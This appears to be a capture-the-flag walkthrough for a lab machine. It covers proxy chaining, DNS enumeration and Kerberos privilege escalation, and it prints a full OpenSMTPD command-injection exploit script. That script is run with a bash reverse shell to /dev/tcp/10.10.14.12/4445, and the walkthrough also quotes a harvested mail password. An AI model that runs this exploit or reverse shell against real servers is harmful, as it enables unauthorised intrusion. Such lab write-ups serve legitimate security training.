Basic information

Port scan

This takes a long time:

➜  ~ nmap -sT -Pn 10.10.10.224
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 10:10 EST
Nmap scan report for 10.10.10.224
Host is up (0.069s latency).
Not shown: 805 closed ports, 191 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
88/tcp open kerberos-sec
3128/tcp open squid-http

Nmap done: 1 IP address (1 host up) scanned in 1031.14 seconds

3128

Port 3128 is a Squid proxy; accessing it directly, the error page gives away the domain name:

53

Port 53 is DNS. Using the domain name obtained via port 3128, enumerate subdomains against that server; this reveals several subdomains and internal IPs that presumably have to be reached through the Squid proxy:

dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb

ns.realcorp.htb. 259200 IN A 10.197.243.77
proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb.
ns.realcorp.htb. 259200 IN A 10.197.243.77
wpad.realcorp.htb. 259200 IN A 10.197.243.31
ns.realcorp.htb. 259200 IN A 10.197.243.77

proxychains

Enumerating and testing step by step from the information gathered, the final complete proxy chain is:

# proxychains conf
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128

# kali
proxychains4 firefox wpad.realcorp.htb

# hosts
10.197.243.31 wpad.realcorp.htb

nmap

Then enumerate through the proxy chain:

➜  ~ proxychains4 nmap 10.197.243.31
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 10:09 EST
Nmap scan report for wpad.realcorp.htb (10.197.243.31)
Host is up (0.28s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
464/tcp open kpasswd5
749/tcp open kerberos-adm
3128/tcp open squid-http

Nmap done: 1 IP address (1 host up) scanned in 301.92 seconds

wpad.realcorp.htb

Accessing it directly through the proxy returns 403:

wpad.dat

Note that WPAD stands for Web Proxy Auto-Discovery Protocol.

function FindProxyForURL(url, host) {
if (dnsDomainIs(host, "realcorp.htb"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
return "DIRECT";

return "PROXY proxy.realcorp.htb:3128";
}
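The PAC file above is what exposed 10.241.251.0/24: a WPAD file has to declare which destinations are internal (DIRECT) and which go via the proxy, so anyone who can fetch it learns the internal address ranges. The Python below is an added example, not code from the original post; it parses those rules out of the PAC text and re-evaluates FindProxyForURL for a host, with FAKE_DNS as a constructed stand-in for dnsResolve().

```python
import ipaddress
import re

# The wpad.dat shown above, embedded here so the example runs offline.
WPAD_DAT = """function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT";
    return "PROXY proxy.realcorp.htb:3128";
}"""
# Constructed stand-in for dnsResolve(): the answers the internal DNS server gave above.
FAKE_DNS = {"wpad.realcorp.htb": "10.197.243.31", "smtp.realcorp.htb": "10.241.251.113"}

def parse_pac(text):
    """Extract the DIRECT domain suffixes, the DIRECT subnets and the fallback proxy."""
    domains = re.findall(r'dnsDomainIs\(\s*host\s*,\s*"([^"]+)"\s*\)', text)
    nets = [ipaddress.ip_network(f"{net}/{mask}") for net, mask in
            re.findall(r'isInNet\([^,]+,\s*"([^"]+)"\s*,\s*"([^"]+)"\s*\)', text)]
    proxy = re.search(r'return\s+"PROXY\s+([^"]+)"', text)
    return {"domains": domains, "networks": nets, "proxy": proxy.group(1) if proxy else None}

def resolve(host, dns=FAKE_DNS.get):
    """dnsResolve(): an IP literal resolves to itself; unknown names resolve to None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        ip = dns(host)
        return ipaddress.ip_address(ip) if ip else None

def find_proxy_for_url(rules, host):
    """Re-evaluate the PAC decision for one host using the rules parse_pac() extracted."""
    if any(host.endswith(d) for d in rules["domains"]):      # dnsDomainIs() is a suffix match
        return "DIRECT"
    addr = resolve(host)
    if addr is not None and any(addr in n for n in rules["networks"]):   # isInNet()
        return "DIRECT"
    return "PROXY " + rules["proxy"]
```

Running parse_pac() over a fetched wpad.dat is a quick way to list every internal range a WPAD endpoint publishes, which is worth checking before exposing it to untrusted clients.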

10.241.251.0/24

The WPAD config reveals a new subnet, 10.241.251.0/24; probing it shows OpenSMTPD on port 25 of 10.241.251.113:

➜  Tentacle proxychains4 nmap -sC -sV 10.241.251.113
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 11:49 EST
Nmap scan report for 10.241.251.113
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
Service Info: Host: smtp.realcorp.htb

Nmap done: 1 IP address (1 host up) scanned in 282.22 seconds

OpenSMTPD

Related vulnerability:

proxychains4 python3 smtp_exp.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.12/4445 <&1"'

nc -lvvp 4445

The exploit lands a root shell on the SMTP host:

smtp_exp.py

import socket, time
import sys

if len(sys.argv) < 4:
    print("usage: getShell.py <host> <port> <command>")
    sys.exit()

HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]

payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""

# Connect to the first address family that works (IPv4 or IPv6).
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError as msg:
        s.close()
        s = None
        continue
    break

if s is None:
    print('could not open socket')
    sys.exit(1)

with s:
    data = s.recv(1024)
    print('Received', repr(data))
    time.sleep(1)
    print('SENDING HELO')
    s.send(b"helo test.com\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
    time.sleep(1)
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"DATA\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(payload)
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"QUIT\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    print("Exploited. Check your netcat :D")
    s.close()

Information gathering

.msmtprc

In j.nakazawa's home directory there is a .msmtprc file containing a password, but it cannot be used to SSH in directly:

# Set default values for all following accounts.
defaults
auth on
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /dev/null

# RealCorp Mail
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60

# Set a default account
account default : realcorp

kerberos

The idea is to obtain a Kerberos ticket and then SSH in directly; once the ticket exists, SSH does not ask for a password, so if it prompts for one, something in the setup is wrong:

sudo apt install krb5-user

# /etc/hosts
# keep only this entry in hosts
10.10.10.224 srv01.realcorp.htb

# /etc/krb5.conf
# modify/add the corresponding settings
default_realm = REALCORP.HTB

REALCORP.HTB = {
kdc = 10.10.10.224
}

# shell
kinit j.nakazawa # the password is the one obtained above
klist
ssh j.nakazawa@10.10.10.224

user flag

user.txt is then in the home directory:

Privilege escalation information

crontab

The scheduled tasks show admin running log_backup.sh every minute:

[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * admin /usr/local/bin/log_backup.sh

log_backup.sh

It periodically copies files from the squid log directory into admin's home directory, so if we can write an authentication file into the squid directory it will be copied into admin's home and let us log in:

[j.nakazawa@srv01 ~]$ cat  /usr/local/bin/log_backup.sh
#!/bin/bash

/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log

admin

Write a .k5login file there so that the ticket obtained earlier can be used to log in as admin:

.k5login
j.nakazawa@REALCORP.HTB

cp .k5login /var/log/squid

# try a few times; the sync takes time
ssh admin@srv01.realcorp.htb
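The cron job and the .k5login step above together describe one misconfiguration: a privileged user's job rsyncs a directory a lower-privileged user can write into that user's own home, where files like .k5login or .ssh/authorized_keys are honoured. The Python below is an added audit check, not part of the original post; it reads the crontab and script text from the page and uses assumed (constructed) ownership, mode and group data for /var/log/squid, since the real values are not shown.

```python
import shlex

# Constructed inputs: the crontab entry and log_backup.sh shown above, plus assumed ownership,
# mode and group membership for the squid log directory (the real values are not on the page).
CRONTAB = """SHELL=/bin/bash
# * * * * * user-name command to be executed
* * * * * admin /usr/local/bin/log_backup.sh
"""
SCRIPTS = {"/usr/local/bin/log_backup.sh": """#!/bin/bash
/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log
"""}
DIRS = {"/var/log/squid": ("squid", "squid", 0o770)}   # path -> (owner, group, mode), assumed
GROUPS = {"j.nakazawa": {"j.nakazawa", "squid"}}        # user -> groups, assumed

def writable_by(path, user):
    """Can this user create files in the directory, per the owner/group/other write bits?"""
    owner, group, mode = DIRS.get(path.rstrip("/"), ("root", "root", 0o755))
    as_owner = user == owner and mode & 0o200
    as_group = group in GROUPS.get(user, {user}) and mode & 0o020
    return bool(as_owner or as_group or mode & 0o002)

def cron_jobs(text):
    """Yield (user, command) from a system crontab: 5 schedule fields, then user, then command."""
    for line in text.splitlines():
        words = line.split(None, 6)
        if len(words) == 7 and not line.lstrip().startswith("#") and "=" not in words[0]:
            yield words[5], words[6]

def rsync_copies(script):
    """Return (src, dst) for each rsync invocation: the last two non-option arguments."""
    copies = []
    for line in script.splitlines():
        words = shlex.split(line)
        if words and words[0].endswith("rsync"):
            args = [w for w in words[1:] if not w.startswith("-")]
            if len(args) >= 2:
                copies.append((args[-2], args[-1]))
    return copies

def audit(crontab, scripts, low_priv_user):
    """Flag jobs that rsync a directory writable by low_priv_user into the job owner's home,
    where files such as .k5login or .ssh/authorized_keys are honoured for that owner."""
    findings = []
    for user, cmd in cron_jobs(crontab):
        script = scripts.get(cmd.split()[0], cmd)   # inline command if no script body is known
        for src, dst in rsync_copies(script):
            if dst.rstrip("/").startswith(f"/home/{user}") and writable_by(src, low_priv_user):
                findings.append((user, src, dst))
    return findings
```

The fix the finding points at is to sync into a dedicated directory rather than the home directory itself (or exclude dotfiles), and to tighten write access on the log directory.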

klist

Now as admin, klist shows many keytab entries:

So what is a keytab file?

A keytab is a file containing pairs of Kerberos principals and encrypted keys (derived from the Kerberos password). With a keytab you can authenticate to various remote systems via Kerberos without entering a password.

[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
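What makes the listing above dangerous is not the host/ keys, which belong in /etc/krb5.keytab, but the kadmin/ keys sitting next to them in a file a non-root user could read. The Python below is an added audit check, not from the original post; it parses the klist -k output shown above (constructed copy, with the repeated per-enctype lines collapsed) and flags both problems, using an assumed file mode since the page does not show one.

```python
import re

# Constructed inputs: the `klist -k /etc/krb5.keytab` listing shown above (klist prints one line
# per encryption type, so the same principal repeats) and an assumed file mode for the keytab.
KLIST_OUTPUT = """Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
"""
ASSUMED_MODE = 0o644   # the page only shows that a non-root user could read the file

def parse_klist(text):
    """Return the distinct (kvno, principal) pairs from `klist -k` output."""
    entries = set()
    for line in text.splitlines():
        m = re.match(r"\s*(\d+)\s+(\S+@\S+)\s*$", line)
        if m:
            entries.add((int(m.group(1)), m.group(2)))
    return entries

def audit_keytab(text, mode, host_fqdn):
    """A machine's host keytab should hold only host/<fqdn> keys and be readable by root alone;
    any other key in it lets whoever reads the file act as that principal (kadmin -k -t)."""
    findings = []
    if mode & 0o077:
        findings.append("keytab is accessible to non-root users (mode %o)" % mode)
    for _, principal in sorted(parse_klist(text)):
        service, _, _realm = principal.partition("@")
        name, _, instance = service.partition("/")
        if name != "host":
            findings.append("non-host service key in host keytab: " + principal)
        elif instance != host_fqdn:
            findings.append("host key belonging to another machine: " + principal)
    return findings
```

On a KDC the kadmin/ keys belong in the separate kadm5 keytab, readable by the kadmind process only.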

exploit

So we can use kadmin with that keytab to create a root principal and obtain a ticket for it:

kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB

add_principal root@REALCORP.HTB
# choose your own password

root flag

Then ksu to root and read root.txt:

References